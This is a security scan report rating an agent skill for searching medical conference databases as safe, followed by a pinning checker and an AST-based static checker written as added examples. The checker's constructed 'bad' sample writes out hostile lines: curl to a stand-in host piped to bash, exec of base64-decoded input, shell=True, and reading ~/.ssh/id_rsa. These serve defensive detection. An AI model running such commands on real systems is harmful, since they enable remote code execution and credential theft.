Trusted — Risk Score 5/100
Last scan: 2 days ago
medical-conference-search
Search medical conference and presentation databases via the NoahAI API. Supports conference search, presentation search, and chained search workflows.
This is a straightforward medical conference search skill that makes HTTPS API calls to a single documented endpoint using a declared Bearer token — no malicious behavior detected.
Skill Name: medical-conference-search
Duration: 34.2s
Engine: pi
Safe to install
No action required. Optionally pin the requests library to a specific version to reduce supply-chain risk.

Findings (2 items)

[Low] Unpinned 'requests' dependency
Location: scripts/search_chained.py:14
The code imports requests without a version constraint. An unconstrained pip install requests could resolve to a vulnerable version. The import error handling on line 14 prints a helpful install message but does not enforce a safe version.
import requests
→ Add a version constraint, e.g. pip install "requests>=2.31.0". Note that a >= lower bound only excludes older releases; a reproducible install needs an exact pin (requests==<version>), ideally verified with pip's --require-hashes.

[Info] Unused import in all scripts
Location: scripts/search_chained.py:13
urllib.parse.urljoin is imported in all three scripts but never used. This is harmless dead code.
from urllib.parse import urljoin
→ Remove the unused import for cleaner code.
Resource | Declared | Inferred | Status | Evidence
Network | READ | READ | ✓ Aligned | All three scripts POST to https://www.noah.bio/api/ with a Bearer token (SKILL.m…
Environment | READ | READ | ✓ Aligned | os.environ.get('NOAH_API_TOKEN') accessed in all three scripts; declared in SKIL…
Filesystem | NONE | WRITE | ✓ Aligned | --output flag writes to disk (search_chained.py line 310, search_conferences.py …
Shell | NONE | NONE | | No subprocess, os.system, or shell=True calls found in any script
Skill Invoke | NONE | NONE | | Scripts do not invoke other skills
Clipboard | NONE | NONE | | No clipboard access detected
Browser | NONE | NONE | | No browser automation detected
Database | NONE | NONE | | No database access detected
3 findings (External URLs)

Severity | Type | URL | Location
Medium | External URL | https://noah.bio | SKILL.md:339
Medium | External URL | https://www.noah.bio/api/ | SKILL.md:345
Medium | External URL | https://www.noah.bio | scripts/search_chained.py:40

File Tree

4 files · 39.9 KB · 1085 lines
Python: 3 files · 736 lines · Markdown: 1 file · 349 lines
├─ 📁 scripts
│ ├─ 🐍 search_chained.py Python 319L · 11.6 KB
│ ├─ 🐍 search_conferences.py Python 208L · 7.3 KB
│ └─ 🐍 search_presentations.py Python 209L · 7.4 KB
└─ 📝 SKILL.md Markdown 349L · 13.5 KB

Dependencies (1 item)

Package | Version | Source | Known Vulns | Notes
requests | * | pip | No | Version not pinned; a floating dependency could resolve to a vulnerable version in some environments
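The Low finding above and this dependency row both turn on one distinction: a version constraint is not the same as a pin. The following checker is an added example (not the skill's own code and not the scanner's) that classifies requirement lines by how tightly they constrain a package, using only the standard library. The SAMPLE_REQUIREMENTS text is constructed here; the skill itself ships no requirements file that the report shows.

```python
"""Classify pip requirement lines by how tightly they constrain a package.

Added example, not the skill's or the scanner's own code. It shows why the
report flags `requests` at version `*` as floating and why the suggested
`requests>=2.31.0` is only a floor: older releases are excluded but any
future release, including a compromised one, would still be accepted.
"""
import re

# Loose subset of PEP 508: name, optional [extras], optional version clauses.
_NAME_RE = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)(?:\[[^\]]*\])?\s*(.*)$")
_CLAUSE_RE = re.compile(r"^(===|==|~=|!=|<=|>=|<|>)\s*(\S+)$")


def parse_requirement(line):
    """Parse one requirements.txt line into name, version clauses and hashes."""
    body = line.split("#", 1)[0].strip()           # drop trailing comment
    hashes = re.findall(r"--hash=(\S+)", body)      # digests for --require-hashes
    body = re.sub(r"--hash=\S+", "", body)
    body = body.split(";", 1)[0].strip()            # drop environment markers
    m = _NAME_RE.match(body)
    if not m:
        raise ValueError(f"unparseable requirement: {line!r}")
    name, spec = m.group(1), m.group(2)
    clauses = []
    for raw in spec.split(","):
        raw = raw.strip()
        if not raw:
            continue
        cm = _CLAUSE_RE.match(raw)
        if not cm:
            raise ValueError(f"bad version clause {raw!r} in {line!r}")
        clauses.append((cm.group(1), cm.group(2)))
    return {"name": name.lower(), "clauses": clauses, "hashes": hashes}


def classify(line):
    """Return one of: floating, floor, bounded, pinned, hash-pinned."""
    req = parse_requirement(line)
    # An exact pin is == or === to a concrete version (not a 2.* wildcard).
    exact = [v for op, v in req["clauses"]
             if op in ("==", "===") and not v.endswith(".*")]
    if exact and req["hashes"]:
        return "hash-pinned"       # resolves to one artifact, verified by digest
    if exact:
        return "pinned"            # one version, but any artifact claiming it
    upper = [op for op, v in req["clauses"]
             if op in ("<", "<=", "~=") or (op == "==" and v.endswith(".*"))]
    if upper:
        return "bounded"           # a range; new patch releases still slip in
    if req["clauses"]:
        return "floor"             # only a lower bound, e.g. >=2.31.0
    return "floating"              # no constraint at all: the report's `*`


def audit_requirements(text):
    """Classify every requirement in a requirements.txt body as [(name, class)]."""
    out = []
    for line in text.splitlines():
        stripped = line.split("#", 1)[0].strip()
        if not stripped or stripped.startswith("-"):
            continue               # blank, comment, or pip option such as -r
        out.append((parse_requirement(line)["name"], classify(line)))
    return out


# Constructed sample; the hash digest is a placeholder, not a real one.
SAMPLE_REQUIREMENTS = """\
# constructed example, not the skill's actual requirements file
requests
urllib3>=2.0
certifi==2024.2.2 --hash=sha256:0123abcd
"""

if __name__ == "__main__":
    for name, cls in audit_requirements(SAMPLE_REQUIREMENTS):
        print(f"{name:<10} {cls}")
```

Only the hash-pinned form closes the supply-chain gap the finding describes; "pinned" still trusts whatever the index serves under that version number, and "floor" accepts every future release.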

Security Positives

✓ All network activity is confined to a single documented HTTPS endpoint: https://www.noah.bio/api/
✓ Bearer token is read from environment (NOAH_API_TOKEN), never hardcoded or exfiltrated
✓ No shell execution (subprocess, os.system, shell=True) in any script
✓ No credential harvesting — only the declared API token is accessed
✓ No sensitive local path access (~/.ssh, ~/.aws, .env files)
✓ No base64 decode/eval/exec patterns present
✓ No remote script download (curl|bash, wget|sh) or runtime installs
✓ Documentation fully matches implementation behavior — doc-to-code alignment is strong
✓ Scripts include proper error handling (ConnectionError, TimeoutError, HTTPError) with informative messages
✓ HTTP redirects are explicitly blocked (allow_redirects=False) to prevent redirect-based credential leakage
✓ The --output file write capability is explicitly documented in SKILL.md
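The positives above are the kind of thing a static pass over the scripts can establish: no shell execution, no eval/exec or base64 decoding, no hardcoded Bearer token, no sensitive local paths, and requests calls made with allow_redirects=False. The following AST walker is an added example (not the scanner engine's code and not the skill's own) that checks a Python source for exactly those patterns. The two scripts it scans, GOOD_SCRIPT and BAD_SCRIPT, are constructed here to resemble the skill's pattern and its opposite; the category names and the check for a missing timeout are this example's own choices.

```python
"""Static checks mirroring the scan report's "Security Positives" list.

Added example, not the skill's or the scanner's own code: an ast walker that
flags shell execution, dynamic code execution, hardcoded Bearer literals,
sensitive local paths, and HTTP calls that follow redirects or lack a timeout.
The two sample scripts are constructed here for illustration.
"""
import ast
import re

SHELL_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.Popen",
               "subprocess.call", "subprocess.check_call", "subprocess.check_output"}
DYNAMIC_CALLS = {"eval", "exec", "compile", "base64.b64decode", "base64.decodebytes"}
HTTP_CALLS = {"requests.get", "requests.post", "requests.put", "requests.request"}
ENV_CALLS = {"os.environ.get", "os.getenv"}
BEARER_LITERAL = re.compile(r"^Bearer\s+\S+$")          # a full token in a literal
SENSITIVE_PATH = re.compile(r"~/\.(ssh|aws)\b|(^|/)\.env$")


def dotted_name(node):
    """Turn a Name/Attribute chain such as requests.post into 'requests.post'."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _hit(node, kind, detail):
    return {"kind": kind, "line": node.lineno, "detail": detail}


def scan_source(src):
    """Return a list of {kind, line, detail} findings for one Python source."""
    hits = []
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Call):
            callee = dotted_name(node.func)
            kwargs = {k.arg: k.value for k in node.keywords if k.arg}
            if callee in SHELL_CALLS:
                hits.append(_hit(node, "shell", f"call to {callee}"))
            shell_kw = kwargs.get("shell")
            if isinstance(shell_kw, ast.Constant) and shell_kw.value is True:
                hits.append(_hit(node, "shell", "shell=True"))
            if callee in DYNAMIC_CALLS:
                hits.append(_hit(node, "dynamic-code", f"call to {callee}"))
            if callee in ENV_CALLS:
                key = node.args[0] if node.args else None
                name = key.value if isinstance(key, ast.Constant) else "<dynamic>"
                hits.append(_hit(node, "env-read", name))
            if callee in HTTP_CALLS:
                redir = kwargs.get("allow_redirects")
                # requests follows redirects by default; only an explicit False is safe.
                if not (isinstance(redir, ast.Constant) and redir.value is False):
                    hits.append(_hit(node, "redirects", f"{callee} follows redirects"))
                if "timeout" not in kwargs:
                    hits.append(_hit(node, "no-timeout", f"{callee} without timeout"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            # f"Bearer {token}" yields a "Bearer " constant, which does not match.
            if BEARER_LITERAL.match(node.value):
                hits.append(_hit(node, "hardcoded-token", "Bearer literal"))
            if SENSITIVE_PATH.search(node.value):
                hits.append(_hit(node, "sensitive-path", node.value))
    return hits


def kinds(src):
    """Sorted set of finding categories for a source; empty means clean."""
    return sorted({h["kind"] for h in scan_source(src)})


# Constructed sample following the pattern the report describes for the skill.
GOOD_SCRIPT = '''
import os, sys, requests
token = os.environ.get("NOAH_API_TOKEN")
if not token:
    sys.exit("NOAH_API_TOKEN is not set")
resp = requests.post("https://www.noah.bio/api/",
                     json={"query": "oncology"},
                     headers={"Authorization": f"Bearer {token}"},
                     allow_redirects=False, timeout=30)
resp.raise_for_status()
'''

# Constructed sample doing everything the positives list says the skill does not.
BAD_SCRIPT = '''
import os, base64, subprocess, requests
headers = {"Authorization": "Bearer sk_live_0123456789abcdef"}
resp = requests.post("https://example.invalid/api/", headers=headers)
os.system("curl https://example.invalid/x.sh | bash")
subprocess.run(["ls"], shell=True)
exec(base64.b64decode("cHJpbnQoMSk="))
keys = open(os.path.expanduser("~/.ssh/id_rsa")).read()
'''

if __name__ == "__main__":
    for label, src in (("good", GOOD_SCRIPT), ("bad", BAD_SCRIPT)):
        for h in scan_source(src):
            print(f"{label}:{h['line']} {h['kind']}: {h['detail']}")
```

The env-read category is informational: the report treats os.environ.get('NOAH_API_TOKEN') as an aligned, declared read, so a reviewer compares the names the walker reports against the declaration rather than flagging them.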